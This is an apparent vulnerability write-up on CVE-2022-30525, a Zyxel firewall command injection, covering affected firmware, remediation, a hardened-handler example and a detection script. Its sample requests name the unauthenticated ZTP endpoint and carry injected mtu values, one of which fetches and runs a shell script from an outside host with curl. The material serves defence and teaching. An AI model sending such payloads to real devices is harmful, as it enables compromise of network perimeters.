What is Zyxel Firewall?
Zyxel is a networking equipment vendor whose firewalls, VPN gateways, and routers are widely deployed by small and medium businesses. The affected product lines (USG FLEX, ATP, and VPN series) are purpose-built network security appliances providing firewall, IDS/IPS, VPN, and content filtering functions. They sit at the network perimeter and are internet-facing by design, which makes them an especially sensitive target: an attacker who compromises the firewall is on the path of every packet crossing the perimeter, can manipulate or tamper with that traffic, disable the protections the device provides, and pivot freely into the protected internal network.
Overview
CVE-2022-30525 is a critical unauthenticated OS command injection vulnerability (CWE-78, CVSS 3.1 base score 9.8) in the CGI program of multiple Zyxel firewall models. An attacker who can reach the device's web management interface can inject arbitrary OS commands that are executed on the underlying Linux operating system as the web server's nobody user. Rapid7 researcher Jake Baines discovered and reported the vulnerability. Exploitation was observed in the wild within days of disclosure, including by a Mirai-based botnet that added the vulnerability to its scanning and infection routines for large-scale device compromise. CISA added it to the Known Exploited Vulnerabilities (KEV) catalog on May 16, 2022, four days after the advisory.
Affected Versions
| Product | Vulnerable Firmware | Fixed Firmware |
|---|---|---|
| USG FLEX 100, 100W, 200, 500, 700 | ZLD 5.00 through 5.21 Patch 1 | ZLD 5.30 |
| USG FLEX 50(W), USG20(W)-VPN | ZLD 5.10 through 5.21 Patch 1 | ZLD 5.30 |
| ATP 100, 200, 500, 700, 800 | ZLD 5.10 through 5.21 Patch 1 | ZLD 5.30 |
| VPN50, VPN100, VPN300, VPN1000 | ZLD 4.60 through 5.21 Patch 1 | ZLD 5.30 |
Technical Details
The vulnerability (CWE-78: OS Command Injection) lies in the Zero Touch Provisioning (ZTP) handler of Zyxel's CGI-based web management interface, the CGI endpoint `/ztp/cgi-bin/handler`, which is reachable without authentication. The handler accepts a JSON body whose `command` field selects an operation; for the `setWanPortSt` command, Rapid7 found that the `mtu` field is concatenated into a shell command string and handed to a system()-style call without any sanitisation or escaping.
An unauthenticated attacker therefore needs only a single crafted HTTP POST to the endpoint. Any shell metacharacter in `mtu` (a `;`, a `|`, or `$(...)`) terminates the command the handler intended to run and starts the attacker's, which the underlying Linux OS executes. The injected commands run as the nobody user rather than root, so full control of the appliance requires a further escalation step on the device; even without one, the attacker holds a shell on a perimeter appliance with visibility into, and a path onto, the protected network.
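To make the bug class concrete, the following is an added illustration and not Zyxel's code (the real ZTP handler is not public, so the helper path `/sbin/set_wan_mtu` and the function names are hypothetical). It builds the shell string a vulnerable handler would pass to `os.system()` for a request carrying an injected `mtu`, and beside it the hardened version: allow-list the field, convert it to an integer, and pass it to `subprocess.run()` as an argv list so no shell ever interprets it. The sample request body is constructed to mirror the shape Rapid7 described.

```python
"""Vulnerable vs hardened handling of the `mtu` field (added example).

Not Zyxel's code: the real ZTP handler is not public, so the helper
path /sbin/set_wan_mtu and the function names are hypothetical. The
request body is constructed to mirror the shape Rapid7 described:
a JSON object whose `command` is setWanPortSt and whose `mtu` carries
an injected shell command.
"""
import json
import re
import subprocess
from typing import List

# Constructed sample request body with an injected `mtu` value.
SAMPLE_BODY = json.dumps({
    "command": "setWanPortSt",
    "proto": "dhcp",
    "port": "4",
    "vlan_tag": "1",
    "vlanid": "5",
    "mtu": "; echo INJECTED > /tmp/pwned ;",
    "data": "hi",
})

# Characters that let a value break out of the intended shell word.
SHELL_META = set(";&|`$<>\n")


def build_vulnerable_command(body: str) -> str:
    """Vulnerable pattern: the untrusted field is pasted into a shell string.

    Returns the string such a handler would pass to os.system(); this demo
    never executes it.
    """
    req = json.loads(body)
    return "/sbin/set_wan_mtu %s %s" % (req["port"], req["mtu"])


def contains_shell_metachars(command: str) -> bool:
    """True if a metacharacter would let the shell start a second command."""
    return any(c in SHELL_META for c in command)


def validate_mtu(value) -> int:
    """Hardened: allow-list the syntax, then enforce a sane numeric range."""
    if not isinstance(value, str) or not re.fullmatch(r"[0-9]{1,4}", value):
        raise ValueError("mtu must be 1-4 decimal digits")
    mtu = int(value)
    if not 68 <= mtu <= 9000:
        raise ValueError("mtu out of range")
    return mtu


def build_safe_argv(body: str) -> List[str]:
    """Hardened: validated values become argv entries; no shell is involved."""
    req = json.loads(body)
    port = req.get("port", "")
    if not isinstance(port, str) or not re.fullmatch(r"[0-9]{1,2}", port):
        raise ValueError("port must be 1-2 decimal digits")
    mtu = validate_mtu(req.get("mtu", ""))
    return ["/sbin/set_wan_mtu", port, str(mtu)]


def run_safely(argv: List[str]) -> int:
    """Execute with shell=False so argv entries can never be reinterpreted.

    Not called in the demo because /sbin/set_wan_mtu is hypothetical.
    """
    return subprocess.run(argv, shell=False, check=False).returncode


if __name__ == "__main__":
    cmd = build_vulnerable_command(SAMPLE_BODY)
    print("vulnerable shell string :", cmd)
    print("metacharacters present  :", contains_shell_metachars(cmd))
    try:
        build_safe_argv(SAMPLE_BODY)
    except ValueError as err:
        print("hardened handler rejects:", err)
    print("hardened argv, clean req:",
          build_safe_argv(json.dumps({"port": "4", "mtu": "1500"})))
```

The point of the hardened path is that escaping is not the fix; the fix is never letting the shell parse attacker data at all. Even where a shell is unavoidable, a value that has been reduced to an integer cannot carry a metacharacter.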
Rapid7 noted that Zyxel shipped the fix (ZLD 5.30) on April 28, 2022 without publishing an advisory, and criticised this as uncoordinated disclosure: a silent patch leaves defenders unaware that an urgent fix exists, while anyone who diffs the new firmware against the old gets a head start on an exploit. Rapid7 and Zyxel subsequently agreed on coordinated public disclosure, and the vendor advisory and Rapid7's write-up were published together on May 12, 2022.
Discovery
Discovered by Rapid7 security researcher Jake Baines, who reported the vulnerability to Zyxel on April 13, 2022. Zyxel released the fixed ZLD 5.30 firmware on April 28, 2022 without an advisory. Rapid7 published its detailed technical write-up, together with a Metasploit module, on the day Zyxel's advisory appeared (May 12, 2022); with a public single-request exploit available, weaponization by botnet operators followed within days.
Exploitation Context
Within days of Rapid7's disclosure, security researchers observed mass exploitation of CVE-2022-30525 by a Mirai-based botnet. Mirai and its variants specialize in compromising network devices (routers, cameras, firewalls) to incorporate them into distributed denial-of-service (DDoS) botnets.
The rapid weaponization (days from public advisory to active botnet exploitation) is typical of internet-facing network device vulnerabilities and reflects:
- The large number of internet-exposed Zyxel firewalls (tens of thousands searchable on Shodan)
- The simplicity of the exploit (single HTTP request, no authentication)
- Established botnet infrastructure pre-built to scan for and exploit new vulnerabilities
Beyond botnet incorporation, threat actors also exploited this vulnerability for:
- Network perimeter access to protected corporate networks
- Disabling firewall protections to facilitate follow-on attacks
- Installing persistent backdoors on the firewall devices
Remediation
- Upgrade firmware to ZLD 5.30 or later immediately: Apply the update via the Zyxel web management console or download it from Zyxel's support portal. Patching removes the injection point but does not undo a compromise that happened before the patch, so pair it with the compromise checks below.
- Disable remote management if not needed: Disable web management access from the WAN interface (internet side) if remote administration is not required.
- Restrict management interface access: If remote management is required, restrict access to specific trusted IP addresses using Zyxel's access control features.
- Check for compromise indicators: Review system logs for unexpected administrative actions, configuration changes, or new user accounts that may indicate prior compromise.
- Enable Zyxel SecuReporter: Configure Zyxel's cloud security analytics to provide ongoing monitoring and alerting for anomalous activity.
- Verify firmware integrity: After patching, verify the running firmware version matches the expected Zyxel release and has not been tampered with.
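The "check for compromise indicators" step and the single-request exploitation described under Exploitation Context lend themselves to a simple detector. The following is an added example, not tooling from Zyxel or Rapid7. It assumes you have captured HTTP requests with their bodies (from a reverse proxy, a WAF log that retains bodies, or IDS pcap extraction; a plain access log will not contain the JSON body). The endpoint path `/ztp/cgi-bin/handler` and the `setWanPortSt` / `mtu` names are those reported in Rapid7's analysis; the sample traffic below is constructed for the demo. Any WAN-side request to the ZTP handler is reported as a probe, and a `setWanPortSt` request with shell metacharacters in a string field is reported as an exploit attempt.

```python
"""Flag CVE-2022-30525 exploitation attempts in captured HTTP requests.

Added example, not from Zyxel or Rapid7. Input is raw HTTP/1.1 request
text with the body retained. The sample traffic is constructed.
"""
import json
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

ZTP_PATH = "/ztp/cgi-bin/handler"
# A metacharacter that lets a value start a second shell command.
SHELL_META = re.compile(r"[;&|`<>\n]|\$\(")


@dataclass
class Finding:
    src: str
    severity: str            # "probe" or "exploit"
    reason: str
    field: Optional[str] = None


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body


def analyse(src: str, raw: str) -> List[Finding]:
    """Return findings for one request; an empty list means nothing of note."""
    findings: List[Finding] = []
    method, path, _headers, body = parse_request(raw)
    if path != ZTP_PATH:
        return findings
    # The ZTP handler is reachable pre-auth; any hit from an untrusted
    # source is worth recording even if the body looks benign.
    findings.append(Finding(src, "probe", "%s to ZTP handler" % method))
    try:
        req = json.loads(body) if body else {}
    except ValueError:
        return findings
    if isinstance(req, dict) and req.get("command") == "setWanPortSt":
        for key, value in req.items():
            if isinstance(value, str) and SHELL_META.search(value):
                findings.append(Finding(
                    src, "exploit",
                    "shell metacharacters in setWanPortSt parameter", key))
    return findings


def scan(traffic: List[Tuple[str, str]]) -> List[Finding]:
    """Run analyse() over (source_ip, raw_request) pairs."""
    out: List[Finding] = []
    for src, raw in traffic:
        out.extend(analyse(src, raw))
    return out


def _req(method: str, path: str, body: str = "") -> str:
    """Build a raw HTTP/1.1 request string for the constructed samples."""
    return ("%s %s HTTP/1.1\r\nHost: 198.51.100.7\r\n"
            "Content-Type: application/json\r\nContent-Length: %d\r\n\r\n%s"
            % (method, path, len(body), body))


def _ztp_body(mtu: str) -> str:
    return json.dumps({"command": "setWanPortSt", "proto": "dhcp",
                       "port": "4", "vlan_tag": "1", "vlanid": "5",
                       "mtu": mtu, "data": "hi"})


# Constructed sample traffic: a benign page fetch, a clean ZTP request,
# and an injection attempt in the mtu field.
SAMPLE_TRAFFIC = [
    ("203.0.113.10", _req("GET", "/")),
    ("203.0.113.11", _req("POST", ZTP_PATH, _ztp_body("1500"))),
    ("203.0.113.12", _req("POST", ZTP_PATH,
                          _ztp_body('; bash -c "curl http://203.0.113.12/x.sh | sh";'))),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_TRAFFIC):
        print("%-8s %-14s %s%s" % (f.severity, f.src, f.reason,
                                   " (field=%s)" % f.field if f.field else ""))
```

A hit classed as "exploit" on an unpatched device should be treated as a likely compromise rather than a blocked attempt, since the handler executes the command before returning; at that point the remediation is to reimage the firmware and rotate any credentials the appliance held, not just to upgrade.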
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2022-30525 |
| Vendor / Product | Zyxel — Multiple Firewalls |
| NVD Published | 2022-05-12 |
| NVD Last Modified | 2025-10-27 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-78 (Improper Neutralization of Special Elements used in an OS Command) |
| CISA KEV Added | 2022-05-16 |
| CISA KEV Deadline | 2022-06-06 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
| Metric | Value |
|---|---|
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | None |
| User Interaction (UI) | None |
| Scope (S) | Unchanged |
| Confidentiality (C) | High |
| Integrity (I) | High |
| Availability (A) | High |
Required Action
Apply updates per vendor instructions (CISA BOD 22-01), due 2022-06-06.
Timeline
| Date | Event |
|---|---|
| 2022-04-13 | Rapid7 researcher Jake Baines reported vulnerability to Zyxel |
| 2022-04-28 | Zyxel released ZLD 5.30 firmware containing the fix, without a public advisory |
| 2022-05-12 | Zyxel published its security advisory; CVE published |
| 2022-05-12 | Rapid7 published detailed technical analysis |
| 2022-05-16 | CISA added to KEV; active exploitation by Mirai-based botnet observed |
| 2022-06-06 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2022-30525 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| Zyxel Security Advisory — OS Command Injection in Firewalls (2022-05-12) | Vendor Advisory |